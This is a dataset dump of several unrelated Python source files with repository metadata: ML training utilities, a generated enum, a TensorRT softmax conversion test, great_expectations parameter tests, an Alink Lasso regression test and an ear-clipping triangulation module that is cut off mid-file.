7696dc1c8bbe922fb2a1ba18fe0cdda041fc9cfd
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
tom-andersson/neuralprocesses
|
7696dc1c8bbe922fb2a1ba18fe0cdda041fc9cfd
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
tom-andersson/neuralprocesses
|
7696dc1c8bbe922fb2a1ba18fe0cdda041fc9cfd
|
[
"MIT"
] | null | null | null |
import os
import sys

# Add package to path.
# Prepend the repository root (the parent of this ``tests`` directory) to
# ``sys.path`` so the package under test is importable without installation.
file_dir = os.path.dirname(__file__)
sys.path.insert(0, os.path.abspath(os.path.join(file_dir, "..")))
| 18.625
| 65
| 0.718121
|
4a159e943e79c5d8a77b1e703c0cfbebb16473a5
| 3,342
|
py
|
Python
|
utils.py
|
WebVision-Capstone/WebVision-Cap
|
7ccdf5403b79cc51e061918623ce2c4b4c996c19
|
[
"MIT"
] | null | null | null |
utils.py
|
WebVision-Capstone/WebVision-Cap
|
7ccdf5403b79cc51e061918623ce2c4b4c996c19
|
[
"MIT"
] | null | null | null |
utils.py
|
WebVision-Capstone/WebVision-Cap
|
7ccdf5403b79cc51e061918623ce2c4b4c996c19
|
[
"MIT"
] | 1
|
2020-12-12T16:02:06.000Z
|
2020-12-12T16:02:06.000Z
|
"""General utilities
"""
from typing import List
import argparse
import matplotlib.pyplot as plt
import tensorflow as tf
def plot_accuracy_loss(history: tf.keras.callbacks.History,
                       acc_items: List[str],
                       loss_items: List[str]):
    """Plot accuracy and loss curves from a Keras training history.

    Args:
        history: History object returned by ``model.fit``.
        acc_items: Keys of ``history.history`` to draw on the accuracy axis,
            e.g. ``['accuracy', 'val_accuracy']``.
        loss_items: Keys of ``history.history`` to draw on the loss axis,
            e.g. ``['loss', 'val_loss']``.

    Returns:
        The ``(figure, axes)`` pair so callers can save or restyle the plot
        (previously the handles were discarded, which made the figure
        unusable in non-interactive runs).

    Usage:
        plot_accuracy_loss(
            history,
            ['accuracy', 'val_accuracy'],
            ['loss', 'val_loss'])
    """
    fig, ax = plt.subplots(ncols=2, figsize=(15, 7))
    fig.suptitle('Accuracy and Loss')

    # Left axis: accuracy-style metrics.
    for item in acc_items:
        ax[0].plot(history.history[item], label=item)
    ax[0].set_xlabel('Epochs')
    ax[0].set_ylabel('Accuracy')
    ax[0].legend()

    # Right axis: loss-style metrics.
    for item in loss_items:
        ax[1].plot(history.history[item], label=item)
    ax[1].set_xlabel('Epochs')
    ax[1].set_ylabel('Loss')
    ax[1].legend()

    # Returning the handles is backward compatible: callers that ignored the
    # previous None return are unaffected.
    return fig, ax
def getArgs(argv=None):
    """Parse command-line configuration for a training run.

    Args:
        argv: Optional list of argument strings. When ``None`` argparse
            falls back to ``sys.argv[1:]`` (standard behavior).

    Returns:
        argparse.Namespace with epochs, save_path, job_id, batch_size,
        img_size, workers, unfreeze_layer, and path_to_data.
    """
    parser = argparse.ArgumentParser(
        description='Get config inputs')
    parser.add_argument('epochs',
                        metavar='epochs',
                        type=int,
                        nargs='?',
                        action='store',
                        help='number of training epochs'
                        )
    parser.add_argument('save_path',
                        metavar='save_path',
                        type=str,
                        nargs='?',
                        action='store',
                        help='path to save objects (weights, pickles)'
                        )
    parser.add_argument('job_id',
                        metavar='job_id',
                        type=str,
                        nargs='?',
                        action='store',
                        help='name or id of job'
                        )
    parser.add_argument('--batch_size',
                        metavar='batch_size',
                        type=int,
                        nargs='?',
                        default=64,
                        help='generator batch size'
                        )
    parser.add_argument('--img_size',
                        metavar='img_size',
                        type=int,
                        nargs='?',
                        default=300,
                        help='size of the input image (one side of square)'
                        )
    parser.add_argument('--workers',
                        metavar='workers',
                        type=int,
                        nargs='?',
                        default=1,
                        help='number of threads to load data'
                        )
    # BUG FIX: metavar previously said 'workers' (copy/paste error).
    parser.add_argument('--unfreeze_layer',
                        metavar='unfreeze_layer',
                        type=str,
                        nargs='?',
                        default='',
                        help='unfreeze layers after this one (ConvNet tower)'
                        )
    # BUG FIX: metavar previously said 'pickle', which did not match the
    # option name in the generated help output.
    parser.add_argument('--path_to_data',
                        metavar='path_to_data',
                        type=str,
                        nargs='?',
                        default='',
                        help='path to the input data'
                        )
    # BUG FIX: parse_args() previously ignored the ``argv`` parameter,
    # making the function untestable and always reading sys.argv.
    return parser.parse_args(argv)
| 31.828571
| 77
| 0.413226
|
4a159f02de7df1fdc5bf9310361fc07206411688
| 992
|
py
|
Python
|
src/sima/post/internalpressuredesignfactor.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/post/internalpressuredesignfactor.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
src/sima/post/internalpressuredesignfactor.py
|
SINTEF/simapy
|
650b8c2f15503dad98e2bfc0d0788509593822c7
|
[
"MIT"
] | null | null | null |
# Generated with InternalPressureDesignFactor
#
from enum import Enum
from enum import auto
class InternalPressureDesignFactor(Enum):
    """Internal-pressure design-factor options (generated enum)."""

    DESIGN_PRESSURE = auto()
    INCIDENTAL_PRESSURE = auto()
    PRODUCTION_CASING_WITH_TUBING_LEAK = auto()
    DRILLING_RISER_WITH_EXTREME_PRESSURE = auto()
    HYDROSTATIC_TEST = auto()

    def label(self):
        """Return the human-readable label (with design factor) for this member."""
        cls = type(self)
        # Build the lookup inside the method: a dict class attribute would
        # itself be turned into an enum member.
        labels = {
            cls.DESIGN_PRESSURE: "Design pressure (0.60)",
            cls.INCIDENTAL_PRESSURE: "Incidental pressure (0.67)",
            cls.PRODUCTION_CASING_WITH_TUBING_LEAK: "Production casing with tubing leak (0.81)",
            cls.DRILLING_RISER_WITH_EXTREME_PRESSURE: "Drilling riser with extreme pressure (0.81)",
            cls.HYDROSTATIC_TEST: "Hydrostatic test (0.9)",
        }
        # .get keeps the original behavior of returning None for an
        # (impossible) unmatched member.
        return labels.get(self)
| 41.333333
| 85
| 0.714718
|
4a15a09b0f77eebdf2eedf1c29b20842020da231
| 6,158
|
py
|
Python
|
python/paddle/fluid/tests/unittests/ir/inference/test_trt_convert_softmax.py
|
2742195759/Paddle
|
ce034db1834af85539b22ab68492df9972ff3e69
|
[
"Apache-2.0"
] | 17,085
|
2016-11-18T06:40:52.000Z
|
2022-03-31T22:52:32.000Z
|
python/paddle/fluid/tests/unittests/ir/inference/test_trt_convert_softmax.py
|
2742195759/Paddle
|
ce034db1834af85539b22ab68492df9972ff3e69
|
[
"Apache-2.0"
] | 29,769
|
2016-11-18T06:35:22.000Z
|
2022-03-31T16:46:15.000Z
|
python/paddle/fluid/tests/unittests/ir/inference/test_trt_convert_softmax.py
|
2742195759/Paddle
|
ce034db1834af85539b22ab68492df9972ff3e69
|
[
"Apache-2.0"
] | 4,641
|
2016-11-18T07:43:33.000Z
|
2022-03-31T15:15:02.000Z
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from trt_layer_auto_scan_test import TrtLayerAutoScanTest, SkipReasons
from program_config import TensorConfig, ProgramConfig
import unittest
import numpy as np
import paddle.inference as paddle_infer
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
class TrtConvertSoftmaxTest(TrtLayerAutoScanTest):
    """Auto-scan test for converting the Paddle ``softmax`` op to TensorRT."""

    def is_program_valid(self, program_config: ProgramConfig) -> bool:
        """Reject programs whose softmax ``axis`` does not index an existing
        input dimension."""
        inputs = program_config.inputs
        weights = program_config.weights
        outputs = program_config.outputs
        attrs = [
            program_config.ops[i].attrs
            for i in range(len(program_config.ops))
        ]
        #The input dimension should be less than or equal to the set axis.
        if len(inputs['softmax_input'].shape) <= attrs[0]['axis']:
            return False
        return True

    def sample_program_configs(self):
        """Yield one softmax program per (dims, batch, axis) combination."""
        def generate_input1(attrs: List[Dict[str, Any]], batch):
            # Input of ones whose rank is driven by self.dims (2, 3 or 4).
            if self.dims == 4:
                return np.ones([batch, 3, 24, 24]).astype(np.float32)
            elif self.dims == 3:
                return np.ones([batch, 3, 24]).astype(np.float32)
            elif self.dims == 2:
                return np.ones([batch, 32]).astype(np.float32)
        for dims in [2, 3, 4]:
            for batch in [1, 2, 4]:
                for axis in [-1, 0, 1, 2, 3]:
                    # self.dims is also read later by generate_dynamic_shape.
                    self.dims = dims
                    dics = [{"axis": axis}, {}]
                    ops_config = [{
                        "op_type": "softmax",
                        "op_inputs": {
                            "X": ["softmax_input"]
                        },
                        "op_outputs": {
                            "Out": ["softmax_out"]
                        },
                        "op_attrs": dics[0]
                    }]
                    ops = self.generate_op_config(ops_config)
                    program_config = ProgramConfig(
                        ops=ops,
                        weights={},
                        inputs={
                            "softmax_input": TensorConfig(data_gen=partial(
                                generate_input1, dics, batch))
                        },
                        outputs=["softmax_out"])
                    yield program_config

    def sample_predictor_configs(
            self, program_config) -> (paddle_infer.Config, List[int], float):
        """Yield (inference config, expected TRT node counts, tolerance)
        tuples for static- and dynamic-shape runs in FP32 and FP16."""
        def generate_dynamic_shape(attrs):
            # Min/max/opt profile shapes depend on the input rank under test.
            if self.dims == 4:
                self.dynamic_shape.min_input_shape = {
                    "softmax_input": [1, 3, 24, 24]
                }
                self.dynamic_shape.max_input_shape = {
                    "softmax_input": [4, 3, 48, 48]
                }
                self.dynamic_shape.opt_input_shape = {
                    "softmax_input": [1, 3, 24, 48]
                }
            elif self.dims == 3:
                self.dynamic_shape.min_input_shape = {
                    "softmax_input": [1, 3, 24]
                }
                self.dynamic_shape.max_input_shape = {
                    "softmax_input": [4, 3, 48]
                }
                self.dynamic_shape.opt_input_shape = {
                    "softmax_input": [1, 3, 48]
                }
            elif self.dims == 2:
                self.dynamic_shape.min_input_shape = {"softmax_input": [1, 32]}
                self.dynamic_shape.max_input_shape = {"softmax_input": [4, 64]}
                self.dynamic_shape.opt_input_shape = {"softmax_input": [1, 32]}
        def clear_dynamic_shape():
            # Empty profiles force a static-shape engine build.
            self.dynamic_shape.min_input_shape = {}
            self.dynamic_shape.max_input_shape = {}
            self.dynamic_shape.opt_input_shape = {}
        def generate_trt_nodes_num(attrs, dynamic_shape):
            # One TRT op and two program nodes are always expected.
            return 1, 2
        attrs = [
            program_config.ops[i].attrs
            for i in range(len(program_config.ops))
        ]
        # for static_shape
        clear_dynamic_shape()
        # axis == 0 is skipped for static shape (softmax over the batch dim).
        if attrs[0]['axis'] == 0:
            pass
        else:
            self.trt_param.precision = paddle_infer.PrecisionType.Float32
            yield self.create_inference_config(), generate_trt_nodes_num(
                attrs, False), 1e-5
            self.trt_param.precision = paddle_infer.PrecisionType.Half
            yield self.create_inference_config(), generate_trt_nodes_num(
                attrs, False), 1e-5
        # for dynamic_shape
        generate_dynamic_shape(attrs)
        self.trt_param.precision = paddle_infer.PrecisionType.Float32
        yield self.create_inference_config(), generate_trt_nodes_num(attrs,
                                                                     True), 1e-5
        self.trt_param.precision = paddle_infer.PrecisionType.Half
        yield self.create_inference_config(), generate_trt_nodes_num(attrs,
                                                                     True), 1e-5

    def add_skip_trt_case(self):
        """Register known-broken combinations that should be skipped."""
        def teller1(program_config, predictor_config):
            # 2-D inputs with static shape produce a differing output shape.
            if len(
                    program_config.inputs['softmax_input'].shape
            ) == 2 and not predictor_config.tensorrt_dynamic_shape_enabled():
                return True
            return False
        self.add_skip_case(
            teller1, SkipReasons.TRT_NOT_IMPLEMENTED,
            "The output shape has diff, but we can add shuffle layer to resolve it."
        )

    def test(self):
        """Entry point: register skip cases, then run the auto-scan."""
        self.add_skip_trt_case()
        self.run_test()
# Allow running this test file directly (outside a test runner).
if __name__ == "__main__":
    unittest.main()
| 38.974684
| 84
| 0.546281
|
4a15a10fa8c5130896fdfcba79f7d483e04013ea
| 15,584
|
py
|
Python
|
tests/rule_based_profiler/parameter_builder/test_parameter_container.py
|
pinsleepe/great_expectations
|
37329c906a5a159b54257dbcd897850177eecbcc
|
[
"Apache-2.0"
] | null | null | null |
tests/rule_based_profiler/parameter_builder/test_parameter_container.py
|
pinsleepe/great_expectations
|
37329c906a5a159b54257dbcd897850177eecbcc
|
[
"Apache-2.0"
] | null | null | null |
tests/rule_based_profiler/parameter_builder/test_parameter_container.py
|
pinsleepe/great_expectations
|
37329c906a5a159b54257dbcd897850177eecbcc
|
[
"Apache-2.0"
] | null | null | null |
from typing import Any, Dict, List
from great_expectations.execution_engine.execution_engine import MetricDomainTypes
from great_expectations.rule_based_profiler.types import (
Domain,
ParameterContainer,
build_parameter_container,
build_parameter_container_for_variables,
get_fully_qualified_parameter_names,
get_parameter_values_for_fully_qualified_parameter_names,
)
def test_build_parameter_container(
    parameters_with_different_depth_level_values,
    multi_part_name_parameter_container,
):
    """Populating an empty container from raw values matches the fixture."""
    container = ParameterContainer(parameter_nodes=None)
    build_parameter_container(
        parameter_container=container,
        parameter_values=parameters_with_different_depth_level_values,
    )

    assert container == multi_part_name_parameter_container
def test_get_fully_qualified_parameter_names(
    parameters_with_different_depth_level_values,
    multi_part_name_parameter_container,
):
    """Every variable and parameter is reported under its fully qualified name."""
    container = ParameterContainer(parameter_nodes=None)
    build_parameter_container(
        parameter_container=container,
        parameter_values=parameters_with_different_depth_level_values,
    )

    column_domain = Domain(
        domain_type=MetricDomainTypes.COLUMN,
        domain_kwargs=None,
        details=None,
    )
    # Convert variables argument to ParameterContainer
    variables = build_parameter_container_for_variables(
        variables_configs={
            "my_int": 9,
            "my_float": 3.38,
            "my_string": "hello",
        }
    )
    parameters = {column_domain.id: container}

    expected_names = [
        "$variables.my_int",
        "$variables.my_float",
        "$variables.my_string",
        "$parameter.date_strings.yyyy_mm_dd_hh_mm_ss_tz_date_format.value",
        "$parameter.date_strings.yyyy_mm_dd_hh_mm_ss_tz_date_format.details",
        "$parameter.date_strings.yyyy_mm_dd_date_format.value",
        "$parameter.date_strings.yyyy_mm_dd_date_format.details",
        "$parameter.date_strings.mm_yyyy_dd_hh_mm_ss_tz_date_format.value",
        "$parameter.date_strings.mm_yyyy_dd_hh_mm_ss_tz_date_format.details",
        "$parameter.date_strings.mm_yyyy_dd_date_format.value",
        "$parameter.date_strings.mm_yyyy_dd_date_format.details",
        "$parameter.date_strings.tolerances.max_abs_error_time_milliseconds",
        "$parameter.date_strings.tolerances.max_num_conversion_attempts",
        "$parameter.tolerances.mostly",
        "$parameter.tolerances.financial.usd",
        "$parameter.monthly_taxi_fairs.mean_values.value",
        "$parameter.monthly_taxi_fairs.mean_values.details",
        "$parameter.daily_taxi_fairs.mean_values.value",
        "$parameter.daily_taxi_fairs.mean_values.details",
        "$parameter.weekly_taxi_fairs.mean_values.value",
        "$parameter.weekly_taxi_fairs.mean_values.details",
        "$mean",
    ]

    actual_names = get_fully_qualified_parameter_names(
        domain=column_domain,
        variables=variables,
        parameters=parameters,
    )

    # Order-insensitive comparison: same count, same sorted contents.
    assert len(actual_names) == len(expected_names)
    assert sorted(actual_names) == sorted(expected_names)
def test_get_parameter_values_for_fully_qualified_parameter_names(
    parameters_with_different_depth_level_values,
    multi_part_name_parameter_container,
):
    """Every fully-qualified parameter name must resolve to its stored value.

    Builds a multi-level ParameterContainer for a COLUMN Domain plus a
    "variables" container, then checks that
    get_parameter_values_for_fully_qualified_parameter_names() returns the
    exact name -> value mapping for all "$variables.*" and "$parameter.*"
    entries.  NOTE(review): `multi_part_name_parameter_container` appears to be
    requested only for its fixture side effects — it is not referenced here;
    confirm whether it is still needed.
    """
    parameter_container: ParameterContainer = ParameterContainer(parameter_nodes=None)
    build_parameter_container(
        parameter_container=parameter_container,
        parameter_values=parameters_with_different_depth_level_values,
    )
    # Column-type domain with no kwargs; parameters are keyed by its id below.
    domain: Domain = Domain(
        domain_type=MetricDomainTypes.COLUMN,
        domain_kwargs=None,
        details=None,
    )
    # Convert variables argument to ParameterContainer
    variables: ParameterContainer = build_parameter_container_for_variables(
        variables_configs={
            "my_int": 9,
            "my_float": 3.38,
            "my_string": "hello",
        }
    )
    parameters: Dict[str, ParameterContainer] = {
        domain.id: parameter_container,
    }
    # Expected resolution of every fully-qualified name; the literals mirror
    # the fixture data in `parameters_with_different_depth_level_values`.
    expected_parameter_values_for_fully_qualified_parameter_names: Dict[str, Any] = {
        "$variables.my_int": 9,
        "$variables.my_float": 3.38,
        "$variables.my_string": "hello",
        "$parameter.date_strings.yyyy_mm_dd_hh_mm_ss_tz_date_format.value": "%Y-%m-%d %H:%M:%S %Z",
        "$parameter.date_strings.mm_yyyy_dd_hh_mm_ss_tz_date_format.value": "%m-%Y-%d %H:%M:%S %Z",
        "$parameter.date_strings.yyyy_mm_dd_date_format.details": {
            "confidence": 0.78,
        },
        "$parameter.monthly_taxi_fairs.mean_values.value": [
            2.3,
            9.8,
            42.3,
            8.1,
            38.5,
            53.7,
            71.43,
            16.34,
            49.43,
            74.35,
            51.98,
            46.42,
            20.01,
            69.44,
            65.32,
            8.83,
            55.79,
            82.2,
            36.93,
            83.78,
            31.13,
            76.93,
            67.67,
            25.12,
            58.04,
            79.78,
            90.91,
            15.26,
            61.65,
            78.78,
            12.99,
        ],
        "$parameter.date_strings.yyyy_mm_dd_date_format.value": "%Y-%m-%d",
        "$parameter.date_strings.mm_yyyy_dd_date_format.details": {"confidence": 0.78},
        "$parameter.date_strings.yyyy_mm_dd_hh_mm_ss_tz_date_format.details": {
            "confidence": 0.78
        },
        "$parameter.date_strings.tolerances.max_abs_error_time_milliseconds": 100,
        "$parameter.tolerances.financial.usd": 1.0,
        "$parameter.date_strings.mm_yyyy_dd_hh_mm_ss_tz_date_format.details": {
            "confidence": 0.78
        },
        "$parameter.monthly_taxi_fairs.mean_values.details": {"confidence": "low"},
        "$parameter.tolerances.mostly": 0.91,
        "$parameter.daily_taxi_fairs.mean_values.value": {
            "sunday": 71.43,
            "monday": 74.35,
            "tuesday": 42.3,
            "wednesday": 42.3,
            "thursday": 82.2,
            "friday": 78.78,
            "saturday": 91.39,
        },
        # One per-weekday mean dict per week in the fixture.
        "$parameter.weekly_taxi_fairs.mean_values.value": [
            {
                "sunday": 71.43,
                "monday": 74.35,
                "tuesday": 42.3,
                "wednesday": 42.3,
                "thursday": 82.2,
                "friday": 78.78,
                "saturday": 91.39,
            },
            {
                "sunday": 81.43,
                "monday": 84.35,
                "tuesday": 52.3,
                "wednesday": 43.3,
                "thursday": 22.2,
                "friday": 98.78,
                "saturday": 81.39,
            },
            {
                "sunday": 61.43,
                "monday": 34.35,
                "tuesday": 82.3,
                "wednesday": 72.3,
                "thursday": 22.2,
                "friday": 38.78,
                "saturday": 51.39,
            },
            {
                "sunday": 51.43,
                "monday": 64.35,
                "tuesday": 72.3,
                "wednesday": 82.3,
                "thursday": 22.2,
                "friday": 98.78,
                "saturday": 31.39,
            },
            {
                "sunday": 72.43,
                "monday": 77.35,
                "tuesday": 46.3,
                "wednesday": 47.3,
                "thursday": 88.2,
                "friday": 79.78,
                "saturday": 93.39,
            },
            {
                "sunday": 72.43,
                "monday": 73.35,
                "tuesday": 41.3,
                "wednesday": 49.3,
                "thursday": 80.2,
                "friday": 78.78,
                "saturday": 93.39,
            },
            {
                "sunday": 74.43,
                "monday": 78.35,
                "tuesday": 49.3,
                "wednesday": 43.3,
                "thursday": 88.2,
                "friday": 72.78,
                "saturday": 97.39,
            },
            {
                "sunday": 73.43,
                "monday": 72.35,
                "tuesday": 40.3,
                "wednesday": 40.3,
                "thursday": 89.2,
                "friday": 77.78,
                "saturday": 90.39,
            },
            {
                "sunday": 72.43,
                "monday": 73.35,
                "tuesday": 45.3,
                "wednesday": 44.3,
                "thursday": 89.2,
                "friday": 77.78,
                "saturday": 96.39,
            },
            {
                "sunday": 75.43,
                "monday": 74.25,
                "tuesday": 42.33,
                "wednesday": 42.23,
                "thursday": 82.21,
                "friday": 78.76,
                "saturday": 91.37,
            },
            {
                "sunday": 71.43,
                "monday": 74.37,
                "tuesday": 42.3,
                "wednesday": 42.32,
                "thursday": 82.23,
                "friday": 78.77,
                "saturday": 91.49,
            },
            {
                "sunday": 71.63,
                "monday": 74.37,
                "tuesday": 42.2,
                "wednesday": 42.1,
                "thursday": 82.29,
                "friday": 78.79,
                "saturday": 91.39,
            },
            {
                "sunday": 71.42,
                "monday": 74.33,
                "tuesday": 42.33,
                "wednesday": 42.34,
                "thursday": 82.25,
                "friday": 78.77,
                "saturday": 91.69,
            },
            {
                "sunday": 71.44,
                "monday": 72.35,
                "tuesday": 42.33,
                "wednesday": 42.31,
                "thursday": 82.29,
                "friday": 78.68,
                "saturday": 91.49,
            },
            {
                "sunday": 71.44,
                "monday": 74.32,
                "tuesday": 42.32,
                "wednesday": 42.32,
                "thursday": 82.29,
                "friday": 78.77,
                "saturday": 91.49,
            },
            {
                "sunday": 71.44,
                "monday": 74.33,
                "tuesday": 42.21,
                "wednesday": 42.31,
                "thursday": 82.27,
                "friday": 78.74,
                "saturday": 91.49,
            },
            {
                "sunday": 71.33,
                "monday": 74.25,
                "tuesday": 42.31,
                "wednesday": 42.03,
                "thursday": 82.02,
                "friday": 78.08,
                "saturday": 91.38,
            },
            {
                "sunday": 71.41,
                "monday": 74.31,
                "tuesday": 42.39,
                "wednesday": 42.93,
                "thursday": 82.92,
                "friday": 78.75,
                "saturday": 91.49,
            },
            {
                "sunday": 72.43,
                "monday": 73.35,
                "tuesday": 42.3,
                "wednesday": 32.3,
                "thursday": 52.2,
                "friday": 88.78,
                "saturday": 81.39,
            },
            {
                "sunday": 71.43,
                "monday": 74.35,
                "tuesday": 32.3,
                "wednesday": 92.3,
                "thursday": 72.2,
                "friday": 74.78,
                "saturday": 51.39,
            },
            {
                "sunday": 72.43,
                "monday": 64.35,
                "tuesday": 52.3,
                "wednesday": 42.39,
                "thursday": 82.28,
                "friday": 78.77,
                "saturday": 91.36,
            },
            {
                "sunday": 81.43,
                "monday": 94.35,
                "tuesday": 62.3,
                "wednesday": 52.3,
                "thursday": 92.2,
                "friday": 88.78,
                "saturday": 51.39,
            },
            {
                "sunday": 21.43,
                "monday": 34.35,
                "tuesday": 42.34,
                "wednesday": 62.3,
                "thursday": 52.2,
                "friday": 98.78,
                "saturday": 81.39,
            },
            {
                "sunday": 71.33,
                "monday": 74.25,
                "tuesday": 42.13,
                "wednesday": 42.93,
                "thursday": 82.82,
                "friday": 78.78,
                "saturday": 91.39,
            },
            {
                "sunday": 72.43,
                "monday": 73.35,
                "tuesday": 44.3,
                "wednesday": 45.3,
                "thursday": 86.2,
                "friday": 77.78,
                "saturday": 98.39,
            },
            {
                "sunday": 79.43,
                "monday": 78.35,
                "tuesday": 47.3,
                "wednesday": 46.3,
                "thursday": 85.2,
                "friday": 74.78,
                "saturday": 93.39,
            },
            {
                "sunday": 71.42,
                "monday": 74.31,
                "tuesday": 42.0,
                "wednesday": 42.1,
                "thursday": 82.23,
                "friday": 65.78,
                "saturday": 91.26,
            },
            {
                "sunday": 91.43,
                "monday": 84.35,
                "tuesday": 42.37,
                "wednesday": 42.36,
                "thursday": 82.25,
                "friday": 78.74,
                "saturday": 91.32,
            },
            {
                "sunday": 71.33,
                "monday": 74.45,
                "tuesday": 42.35,
                "wednesday": 42.36,
                "thursday": 82.27,
                "friday": 26.78,
                "saturday": 71.39,
            },
            {
                "sunday": 71.53,
                "monday": 73.35,
                "tuesday": 43.32,
                "wednesday": 42.23,
                "thursday": 82.32,
                "friday": 78.18,
                "saturday": 91.49,
            },
            {
                "sunday": 71.53,
                "monday": 74.25,
                "tuesday": 52.3,
                "wednesday": 52.3,
                "thursday": 81.23,
                "friday": 78.78,
                "saturday": 78.39,
            },
        ],
        "$parameter.weekly_taxi_fairs.mean_values.details": {
            "confidence": "high",
        },
        "$parameter.date_strings.mm_yyyy_dd_date_format.value": "%m-%Y-%d",
        "$parameter.daily_taxi_fairs.mean_values.details": {
            "confidence": "medium",
        },
        "$parameter.date_strings.tolerances.max_num_conversion_attempts": 5,
        "$mean": 0.65,
    }
    parameter_values_for_fully_qualified_parameter_names: Dict[
        str, Any
    ] = get_parameter_values_for_fully_qualified_parameter_names(
        domain=domain,
        variables=variables,
        parameters=parameters,
    )
    # Exact dict equality: both the set of names and every resolved value.
    assert (
        parameter_values_for_fully_qualified_parameter_names
        == expected_parameter_values_for_fully_qualified_parameter_names
    )
| 32.198347
| 99
| 0.462718
|
4a15a1babdcb7c77cf47122ef92fc9ad911f3d74
| 901
|
py
|
Python
|
python/src/main/python/pyalink/alink/tests/examples/operator/batch/test_lasso_reg.py
|
wenwei8268/Alink
|
c00702538c95a32403985ebd344eb6aeb81749a7
|
[
"Apache-2.0"
] | null | null | null |
python/src/main/python/pyalink/alink/tests/examples/operator/batch/test_lasso_reg.py
|
wenwei8268/Alink
|
c00702538c95a32403985ebd344eb6aeb81749a7
|
[
"Apache-2.0"
] | null | null | null |
python/src/main/python/pyalink/alink/tests/examples/operator/batch/test_lasso_reg.py
|
wenwei8268/Alink
|
c00702538c95a32403985ebd344eb6aeb81749a7
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import numpy as np
import pandas as pd
from pyalink.alink import *
class TestYuhe(unittest.TestCase):
    """Smoke test for Alink's Lasso regression batch operators."""

    def test_lasso_reg_op(self):
        # Tiny in-memory dataset: features f0, f1 and an integer label.
        data = np.array([
            [2, 1, 1],
            [3, 2, 1],
            [4, 3, 2],
            [2, 4, 1],
            [2, 2, 1],
            [4, 3, 2],
            [1, 2, 1],
            [5, 3, 3]])
        df = pd.DataFrame({"f0": data[:, 0],
                           "f1": data[:, 1],
                           "label": data[:, 2]})
        batchData = dataframeToOperator(df, schemaStr='f0 int, f1 int, label int', op_type='batch')
        colnames = ["f0", "f1"]
        # Lambda is the L1 regularization strength of the Lasso trainer.
        lasso = LassoRegTrainBatchOp().setLambda(0.1).setFeatureCols(colnames).setLabelCol("label")
        model = batchData.link(lasso)
        predictor = LassoRegPredictBatchOp().setPredictionCol("pred")
        # print() triggers execution of the batch job and dumps predictions.
        predictor.linkFrom(model, batchData).print()
| 28.15625
| 99
| 0.507214
|
4a15a1d218b7406ee26d7ab656bc06e27087fb41
| 3,540
|
py
|
Python
|
arcade/earclip_module.py
|
markjoshua12/arcade
|
74a8012a001229cee677acbf2a285ef677c8b691
|
[
"MIT"
] | 1
|
2020-01-18T04:48:38.000Z
|
2020-01-18T04:48:38.000Z
|
arcade/earclip_module.py
|
markjoshua12/arcade
|
74a8012a001229cee677acbf2a285ef677c8b691
|
[
"MIT"
] | null | null | null |
arcade/earclip_module.py
|
markjoshua12/arcade
|
74a8012a001229cee677acbf2a285ef677c8b691
|
[
"MIT"
] | null | null | null |
"""
from: https://github.com/linuxlewis/tripy/blob/master/tripy.py
"""
import math
from collections import namedtuple
# Lightweight 2D point with named x/y access, used by all clipping helpers.
Point = namedtuple('Point', ['x', 'y'])
def earclip(polygon):
    """
    Simple earclipping algorithm for a given polygon p.
    polygon is expected to be an array of 2-tuples of the cartesian points of the polygon
    For a polygon with n points it will return n-2 triangles.
    The triangles are returned as an array of 3-tuples where each item in the tuple is a 2-tuple of the cartesian point.
    Implementation Reference:
        - https://www.geometrictools.com/Documentation/TriangulationByEarClipping.pdf
    """
    ear_vertex = []
    triangles = []
    # Normalize input to Point namedtuples and force counter-clockwise winding.
    polygon = [Point(*point) for point in polygon]
    if _is_clockwise(polygon):
        polygon.reverse()
    point_count = len(polygon)
    # Initial scan: collect every vertex that currently forms an "ear".
    for i in range(point_count):
        prev_index = i - 1
        prev_point = polygon[prev_index]
        point = polygon[i]
        next_index = (i + 1) % point_count
        next_point = polygon[next_index]
        if _is_ear(prev_point, point, next_point, polygon):
            ear_vertex.append(point)
    # Clip ears one at a time; each clip removes one vertex and emits one triangle.
    while ear_vertex and point_count >= 3:
        ear = ear_vertex.pop(0)
        i = polygon.index(ear)
        # Neighbor indices are computed BEFORE the ear is removed.
        prev_index = i - 1
        prev_point = polygon[prev_index]
        next_index = (i + 1) % point_count
        next_point = polygon[next_index]
        polygon.remove(ear)
        point_count -= 1
        triangles.append(((prev_point.x, prev_point.y), (ear.x, ear.y), (next_point.x, next_point.y)))
        if point_count > 3:
            # Removing the ear can change ear status of its two neighbors:
            # re-test both and update the pending ear list accordingly.
            prev_prev_point = polygon[prev_index - 1]
            next_next_index = (i + 1) % point_count
            next_next_point = polygon[next_next_index]
            groups = [
                (prev_prev_point, prev_point, next_point, polygon),
                (prev_point, next_point, next_next_point, polygon)
            ]
            for group in groups:
                p = group[1]
                if _is_ear(*group):
                    if p not in ear_vertex:
                        ear_vertex.append(p)
                elif p in ear_vertex:
                    ear_vertex.remove(p)
    return triangles
def _is_clockwise(polygon):
    """Return True when the polygon's vertices are wound clockwise.

    Computes the shoelace-style signed sum over the directed edges (wrapping
    from the last vertex back to the first); a positive total means clockwise.
    """
    wrapped = polygon[1:] + polygon[:1]
    signed_sum = sum((b.x - a.x) * (b.y + a.y) for a, b in zip(polygon, wrapped))
    return signed_sum > 0
def _is_convex(prev, point, next_point):
    """True when the vertex triple makes a convex (counter-clockwise) turn."""
    turn = _triangle_sum(prev.x, prev.y, point.x, point.y, next_point.x, next_point.y)
    return turn < 0
def _is_ear(p1, p2, p3, polygon):
    """An "ear" is a convex corner (p1, p2, p3) of non-zero area that contains
    no other vertex of the polygon."""
    return (
        _contains_no_points(p1, p2, p3, polygon)
        and _is_convex(p1, p2, p3)
        and _triangle_area(p1.x, p1.y, p2.x, p2.y, p3.x, p3.y) > 0
    )
